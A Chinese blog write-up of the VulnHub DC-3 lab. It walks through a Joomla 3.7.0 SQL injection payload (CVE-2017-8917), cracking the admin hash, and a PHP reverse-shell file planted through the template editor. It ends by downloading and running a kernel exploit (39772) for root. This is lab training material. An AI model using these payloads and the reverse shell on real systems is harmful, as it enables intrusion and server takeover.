首页 > 其他分享 >vulnhun-DC-3

vulnhun-DC-3

时间:2023-12-15 12:56:27浏览次数:30  
标签:shell 43.61 DC 192.168 提权 sql vulnhun php

dc-3

kali:192.168.43.149

dc3:192.168.43.61

image-20230619151203883

只开放了80端口

sudo nmap --script=vuln 192.168.43.61

漏洞扫描发现一个sql注入感觉有价值

joomla3.7.0有sql注入漏洞
http://192.168.43.61/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,version(),0x7e),1)

手工注入一下

当前数据库:joomladb

schema_name:joomladb,mysql,performance_sche
table_name:#__associations,#__banner

image-20230619163351917

用sqlmap跑出username字段——admin

password字段——$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

密码是hash值

john爆破得到明文:snoopy

登录进入后台成功

在后台的templates点击beez3有新建文件接口

建一个php文件,内容为:

<?php
$sock = fsockopen($ip, $port);
$descriptorspec = array(
        0 => $sock,
        1 => $sock,
        2 => $sock
);
$process = proc_open('/bin/sh', $descriptorspec, $pipes);
proc_close($process);
?>
#$ip为kali的ip,端口为Kali监听端口

访问:http://192.168.43.61/templates/beez3/shell.php

反弹shell成功,发现有python环境,获取交互式shell:

python -c 'import pty;pty.spawn("/bin/sh")'

whoami查看用户——www-date

cat /etc/passwd查看用户权限

image-20230619200755185

uname -a查看系统

image-20230619200850875

这里需要提权

尝试find提权:

which find
ls -l find路径
没有s不能用find提权

尝试vim提权失败

找wp

说是这个ubuntu16.04有系统漏洞可用于提权

searchsploit Ubuntu16.04找到

image-20230619203141481

打开查看这个文件

cat /usr/share/exploitdb/exploits/linux/local/39772.txt

文件后面有个下载路径

在控制靶机shell的界面下载

wget url

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

解压 unzip 39772.zip

cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
./compile.sh
./doubleput
执行完上面文件后,发现变成root用户

总结

需要了解的:

CVE-2017-8917

joomla3.7.0的sql注入漏洞

注入点:http://192.168.43.61/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x7e,version(),0x7e),1)
该Ubuntu系统提权漏洞
在写入反弹shell的php文件后,文件所在的路径怎么试出来的

发现在页面有提示:

image-20230619205214770

收获:

了解了searchsploit工具

利用sql注入得到用户名及密码,直接爆破密码登录后台

进入后台一般是找创建文件(有些模板、扩展)的接口来写木马或者反弹shell

梳理

前期的主机发现、端口探测、目录扫描、漏洞扫描都没问题

最终确定了cms的一个sql注入漏洞有利用价值

出问题的地方:sql注入不熟悉(手工打不出来)、sqlmap工具不熟悉(边查边用的)

然后爆破密码的hash值,登入后台都没问题

出问题的地方:在后台找接口写木马或弹shell的地方找了半天,还有就是shell.php所在路径寻找不熟悉

然后反弹shell成功、python获取交互式shell

出问题的地方:提权压根不会

标签:shell,43.61,DC,192.168,提权,sql,vulnhun,php
From: https://www.cnblogs.com/q1stop/p/17903139.html

相关文章

  • DC-1
    vulnhubDC-1tmuxkali命令窗布局tmuxsplit-window——划分上下两个窗格tmuxsplit-window-h——划分左右两个窗格先kali用nmap探测ipkali的ip:192.168.43.149由于靶机用虚拟机搭建,它和kali在同一网段nmap扫描:1.nmap-sP192.168.43.0/24或者使用arp-scan-l探测该网段......
  • DC电源模块:为您的电子设备提供稳定可靠的能量
    DC电源模块:为您的电子设备提供稳定可靠的能量BOSHIDADC电源模块是一种电子设备,用于为其他电子设备提供稳定可靠的直流电能。它通常由一个输入端,一个输出端和一些内部电路组成。输入端通常接收来自交流电源或其他电源的电能,经过内部电路的处理后,以所需的稳定电压输出到输出端,供其......
  • 高校刮起元宇宙风!3DCAT实时云渲染助力川轻化元校园建设
    元宇宙,是一个虚拟的网络世界,它与现实世界相互连接,为人们提供了一个身临其境的数字体验。元宇宙的概念并不新鲜,早在上个世纪就有科幻作家和电影导演对它进行了想象和创造。但是,随着科技的发展,特别是5G、AI、XR等前沿技术的突破,元宇宙的构建和发展已经成为可能,甚至成为了一种趋势。......
  • 让艺术触手可及!3DCAT实时云渲染赋能真浪数字艺术馆首展
    2023年5月18日,由真浪数字艺术和EZVR联合打造的真浪数字艺术馆首展–「破界·交织」让艺术更自由,正式与大家相见。此次展览分为五个主题展馆,汇聚了来自全球各领域的19位青年数字艺术家一同探讨虚实共生、人机共生和万物共生的艺术创作。真浪数字艺术馆由杭州虚拟人科技有限公司......
  • 事件相机PEK4I36HDCDMP 普诺飞思(Prophesee)EVK4 IMX636ES
    事件相机PEK4I36HDCDMP普诺飞思(Prophesee)EVK4IMX636ES探索基于事件的视觉,从PROPHESEEEVK4HD开始。这款超轻、紧凑的高清Metavision®评估套件,可承受现场测试条件。集成IMX636(高清),堆叠式事件视觉传感器由索尼半导体解决方案公司发布,由索尼和PROPHESEE合作实现。  ......
  • vulnhub DC-9靶场
    1.信息收集扫描主机sudoarp-scan-l扫描端口,发现只有80端口nmap-p-192.168.42.150扫描80开放的服务nmap-p80-A-V192.168.42.1502.漏洞发掘访问主页面发现有查找功能,猜测此处有sql注入漏洞测试sql注入漏洞‘or1=1#获取成功,存在注入漏洞,开始利用bp......
  • orchardcore 部署saas系统
    使用orchardcore搭建saas的webhost服务网络托管服务是一种互联网托管服务,允许个人和组织通过万维网访问他们的网站。我们将使用OrchardCoreCMS框架创建一个多租户、SaaS、Web托管服务。1启动VisualStudio,然后“创建新项目”。选择“ASP.NETCoreWebApplication”......
  • DC-8靶场
    准备:目标:获得root权限攻击虚拟机:kali  DC-8靶场:DC:8~VulnHub 虚拟机:IP地址 192.168.88.130 靶场IP地址:192.168.88.129 第一步:信息收集通过arp-scan-l查看本网段的虚拟机也可以通过nmap或者 netdiscover-r192.168.88.0/24netdiscover-r192.168.88......
  • vulnhub DC-5靶场
    1.信息收集扫描主机sudoarp-scan-l扫描端口nmap-p-192.168.42.149扫描指纹whatweb192.168.42.149查看端口详细服务nmap-A-p--v192.168.42.1492.网站分析扫描目录dirbuster浏览网站,发现都是静态页面只有contact.php有上传窗口尝试上传,发现问题copyri......
  • 多种DC电源模块的比较和评价
    多种DC电源模块的比较和评价BOSHIDADC电源模块是一种重要的电子零件,可以将交流电转换为直流电,并为相应的电路提供所需的电能。随着技术的进步,市场上的DC电源模块种类越来越多,不同类型的DC电源模块有着不同的特点和优缺点。 1.线性稳压模块线性稳压模块是一种简单而实用的DC......